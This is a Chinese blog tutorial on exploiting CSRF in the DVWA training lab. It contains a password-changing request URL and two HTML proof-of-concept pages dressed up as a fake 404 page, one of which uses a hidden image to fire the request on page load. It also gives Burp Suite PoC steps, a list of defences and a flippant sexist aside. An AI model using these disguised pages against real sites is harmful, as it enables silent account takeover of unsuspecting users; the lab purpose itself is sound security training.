DVWA-—【CSRF】漏洞利用

最新推荐文章于 2025-05-06 11:59:29 发布
最新推荐文章于 2025-05-06 11:59:29 发布
阅读量1.2k 收藏 5
点赞数 1
分类专栏: Dvwa
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_34914659/article/details/117020651
版权

1.漏洞介绍

      CSRF跨站点请求伪造(Cross—Site Request Forgery),攻击者盗用了你的身份,以你的名义发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成了攻击者所期望的一个操作,比如以你的名义发送邮件、发消息,盗取你的账号,添加系统管理员,甚至于购买商品、虚拟货币转账等。https://www.freebuf.com/articles/web/253838.html CSRF和XSS的最大的区别在于,CSRF并没有盗取cookie而是直接利用。

     下图详细的解释了CSRF漏洞详情

 

2.CSRF在DVWA中的利用

2.1  漏洞利用

设置级别为low级别,发现改变密码的链接就在标题栏中,因此,参考图里的第3步,只要恶意攻击者构造标题栏中的代码

诱骗用户点击,就会发出第三方的请求,伪造用户他自己的身份,修改密码。

http://192.168.xx.xxx/www/DVWA-1.9/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change#

当然,一般情况下,你丢一个这样的链接给受害者,只要不是傻子或者单纯的妹子,基本上都是能识别的,因此可以对此进行隐藏,比如:短链接。

下面进行CSRF的高级漏洞利用,记事本填下下面代码保存为  csrf.html

<html>
<head>
<title>404 Not Found</title>
</head>
<body><h1>Not Found</h1>
<p>The requested URL was not found on this server.</p >
<a href="http://192.168.59.156/DVWA-master/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change#">Return</a>
</body>
</html>

登录dvwa后,注意保证同一浏览器,诱导用户点击 csrf.html,用户在点击 “return”后,密码被更改

注:此处本来使用 隐藏图片 形式,通过页面加载图片的形式访问攻击页面,但刷新页面之后密码并未改变。

使用抓包工具测试,发现隐藏图片的方法不带cookie ,然而,点击式链接会自带Cookieshttps://www.cnblogs.com/cheuhxg/p/14473162.html

后来换了火狐浏览器,发现可以做到隐藏式的利用,利用的代码的如下:

<html>
<head>
<title>404 Not Found</title>
</head>
<body><h1>Not Found</h1>
<p>The requested URL was not found on this server.</p >
<img src="http://192.168.59.156/DVWA-master/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change#" border="0" style="display:none;"/>
<!--<a href="http://192.168.59.156/DVWA-master/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change#">Return</a>
    --->
</body>
</html>

诱导用户访问后,显示报错,但是不知不觉时用户密码已经被修改

2.2 漏洞验证

下面在介绍一下burpsuit如何验证csrf的漏洞

1.创建用户bp抓取到提交的表单右键如图发送到CSRF Poc中

2.如图更改参数

Csrf在burp是这样表达的,你访问了正常网站(burp抓正常数据包),再访问csrf漏洞网站(bp没有这块,bp就是发送到CSRF Poc),攻击者利用你浏览器本地cookie信息,进行恶意请求(参数修改过程),比如修改密码账号。访问结果(html测试结果)

3.中间会生成一个链接复制好到地址栏粘贴打开(注意要在开着bp的代理情况下访问该复制的链接),出现一个按钮点击提交发送请求

4. 然后在bp中放行,修改密码,证明存在csrf漏洞

3.防御手段

1.验证HTTP Referer字段

2.请求地址中添加token并验证

3.在HTTP头中自定义属性并验证

4.在服务端严格区分好POST与GET的数据请求

5.使用验证码或者密码确认方式进行

通过DVWA学习DOM型XSS
Mi1k7ea
01-02 4207
下了个新版的DVWA看了下,发现新增了好几个Web漏洞类型,就玩一下顺便做下笔记,完善一下之前那篇很水的DOM XSS文章,虽然这个也很水 :) 基本概念 DOM,全称Document Object Model,是一个平台和语言都中立的接口,可以使程序和脚本能够动态访问和更新文档的内容、结构以及样式。 DOM型XSS其实是一种特殊类型的反射型XSS,它是基于DOM文档对象模型的一种漏洞,其触...
DVWA——CSRF漏洞
qq_62803993的博客
01-14 432
首先进入初级页面我们知道这是一个修改密码的,当我们输入密码进行修改后,提示修改成功后,我们会发现这也是一个get型提交。那我们就试试直接在地址栏中修改内容,看能否执行成功。(修改内容后,我们复制链接重新打开一个界面,然后输入网址进入页面,出现下图,要注意的是我们必须使用同一个浏览器,因为在访问页面时通常存在cookie认证,否则即使点击了恶意链接也没用。
【渗透测试】CSRF漏洞的原理、利用方式和防范措施
最新发布
凪的博客
05-06 963
是一种利用用户已登录的会话状态,伪造合法请求执行恶意操作的漏洞
DVWACSRF漏洞
qq_40023447的博客
07-18 1686
CSFR漏洞 CSRF简介 CSRF全名是Cross Site Request Forgery,翻译成中文就是跨站点请求伪造。其通过利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作。 漏洞原理 因为Web应用程序在用户进行敏感操作时,如修改账...
DVWA系列之15 文件包含漏洞利用
weixin_33883178的博客
12-22 214
明白了文件包含的原理之后,下面我们进入DVWA,选择low级别的文件包含。在页面中有提示,可以编辑URL中的page参数从而包含指定的文件,默认情况下包含的是include.php文件。 我们在D:\AppServ\www\dvwa\vulnerabilities\fi目录中创建一个测试文件test.txt,文件内容是“File Inclusion test!!”,通过文件包含漏洞可以直接查看到该...
使用dvwa环境进行csrf漏洞练习
DXfighting_的博客
04-14 749
登录dvwa环境,并将等级设为low, 打开csrf看到一个修改密码界面 查看源代码,发现这里只对两次输入的密码是不是相同进行判断,未做任何防护 使用hackerbar发现输入的参数在url中,我们可以利用这个特点 写一个csrf.Php文件, <img src="http://127.0.0.1/DVWA-1.9/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change..
DVWA-安装-漏洞测试-漏洞修复指南.docx
05-17
#### CSRF漏洞 1. **漏洞分析**: - 低级漏洞中,修改密码无需验证原密码,仅需新密码与确认密码一致即可。 - 中级漏洞引入了HTTP_REFERER检查,增加了攻击的复杂性。 - 高级漏洞中增加了对原密码的验证。 2. **...
DVWA-CSRF漏洞
sc_Pease的博客
01-29 490
参考:https://blog.youkuaiyun.com/qq_44720671/article/details/97393100 一、漏洞简介 1,CSRF:cross-site request forgery跨站请求伪造,一种常见Web攻击。 2,利用场景:攻击者伪造一个请求(通常是一个链接),然后欺骗目标用户点击,用户一旦点击,攻击就完成了。 3,与XSS比较:csrf是借助用户的权限去完成,而xss是盗取用户权限去进行破坏。 二、查看不同难度的dvwa源代码 1,low难度 查看网页源代码
DVWA-CSRF跨站请求伪造 -High级别
xmj818719的博客
02-27 1688
基础知识介绍csrf攻击流程 实验环境: CSRF模拟攻击环境(这里是内网环境,公网只需要对端口进行映射即可,其他操作同理) CentOS7 DVWA服务器(模拟转账系统) 192.168.0.9 kali 黑客(攻击者) 192.168.0.2 Win10 用户(受害者) 192.168.0.5 1使用条件: 1、使用关闭XSS的chrome浏览器 新建chrome浏览器快捷方式 “C:\Program Files (x86)\Google\Chrome\chrome-xss.e
DVWA-master安装包
02-28
DVWA中,每个漏洞都有不同的难度级别,从低到高,帮助用户逐步理解并掌握漏洞利用和防御策略。同时,通过修复这些漏洞,你可以学习如何编写更安全的代码,提高Web应用的安全性。 学习过程中,你还可以利用一些...
DVWA-master.zip
01-04
除了上述常见漏洞外,DVWA还包括如“弱口令”、“CSRF(跨站请求伪造)”、“不安全的直接对象引用”等其他安全挑战,这些都为学习者提供了全面的安全训练。 7. **实践与挑战** 通过DVWA,你可以模拟黑客的攻击...
dvwa详解_DVWA学习日记--CSRF超详细漏洞利用讲解
weixin_42516104的博客
12-24 623
CSRF,全称Cross-site request forgery,翻译过来就是跨站伪请求这是利用受害者未失效的身份认证(cookie,会话),诱骗受害者点击攻击者包含恶意代码的页面,以受害人的身份发送请求给服务器,在受害者不知情的情况下完成攻击(改密码,转账)CSRF与XSS最大的区别就在于,XSS是窃取用户的cookie,而CSRF利用受害者的cookie或其他的身份认证信息以下说的攻击机,...
DVWACSRF漏洞复现
weixin_43263451的博客
07-19 1204
CSRF(跨站请求伪造)定义跨站请求伪造(英语:Cross-site request forgery),也被称为 one-click attack 或者 session riding,通常缩写为 CSRF 或者 XSRF,攻击者会伪造一个请求(通常是一个链接),然后欺骗目标用户点击,用户一旦点击,攻击也就完成了。 基本原理 从上图可以看出,要完成一次CSRF攻击,受害者必须依次完成两个步骤:   ...
DVWACSRF漏洞(详细)
热门推荐
qq_44720671的博客
07-26 2万+
CSRF简介 csrf全称为:Cross-site request forgery,是一种常见的web攻击。在场景中,攻击者会伪造一个请求(通常是一个链接),然后欺骗目标用户点击,用户一旦点击,攻击也就完成了。 与xss的区别:csrf是借助用户的权限完成攻击,攻击者并没有拿到权限;而xss是直接盗取用户权限去进行破坏。 更改难度: 点击dvwa security,选择难度,然后点击submit...
DVWA系列之18 CSRF漏洞分析
weixin_34205076的博客
12-25 257
下面我们来查看一下low级别的CSRF源码:代码中在获取了$pass_new和$pass_conf这两个变量之后,利用mysql_real_escape_string()函数进行了过滤,这样虽然可以防止SQL注入,但却无法阻止CSRF***,之后这两个变量便被直接代入UPDATE语句中执行了数据库更新操作。下面再来分析一下medium级别的代码:可以看到这里在获取$pass_new和$pass_c...
DVWA CSRF 漏洞实践报告
聚焦网络安全,以多元语言优势汲取知识,分享生动有趣的学习与技术心得。
10-13 2243
CSRF(跨站请求伪造)是一种攻击,使得攻击者能够以受害者的身份执行非预期的操作。在靶场DVWA中,我将尝试通过CSRF漏洞更改管理员密码。
DVWA系列之CSRF(跨站请求伪造)源码分析及漏洞利用
7Riven's blog
11-26 938
CSRF(Cross-site request forgery) CSRF,全称Cross-site request forgery,跨站请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密等)。 CSRF与XSS最大的...
文件包含漏洞详解以及DVWA文件包含漏洞利用
weixin_44870846的博客
08-05 1173
目录 文件包含漏洞概述 概念 原理 包含语句: 文件包含实例: 文件包含漏洞特点 文件包含漏洞攻防 文件包含漏洞利用 读取敏感文件 直接包含图片木马 包含图片木马写shell DVWA-File Inclusion文件包含漏洞题解 LOW 方式一 方式二 Medium High 文件包含漏洞概述 概念 程序员将重复的代码写到单个文件中,使用某个功能的时候,直接调用此文件(将此文件的路径赋值给变量,动态调用),无需再次编写,这种调用文件的过程称为包含。 原.
DVWA csrf漏洞\
07-23
DVWA (Damn Vulnerable Web Application) 是一个专门用于安全测试和漏洞练习的开源Web应用程序。CSRF(Cross-Site Request Forgery)是一种常见的Web应用程序安全漏洞,攻击者可以利用它欺骗用户在未经其许可的情况下执行非预期的操作。 在DVWA中,CSRF漏洞可以用来模拟攻击并测试Web应用程序的安全性。攻击者可以通过构建恶意网页或链接,诱使用户在登录状态下访问该页面或点击该链接,从而执行未经授权的操作。 要利用DVWA中的CSRF漏洞进行攻击,首先需要了解目标应用程序的功能和请求结构。然后,攻击者可以构建一个包含恶意请求的HTML页面,并欺骗用户访问该页面。当用户访问页面时,恶意请求将自动发送到目标应用程序,执行攻击者所期望的操作,比如修改用户密码、发送恶意邮件等。 为了防止CSRF攻击,开发人员可以采取一些措施,如使用随机生成的令牌验证每个请求、检查Referer头等。此外,用户也可以采取一些预防措施,比如不点击来自不信任来源的链接、及时退出登录等。 请注意,CSRF漏洞是一种常见的Web应用程序安全问题,开发人员和用户都应该了解并采取相应的防护措施来保护应用程序和个人信息的安全。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小翠儿

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值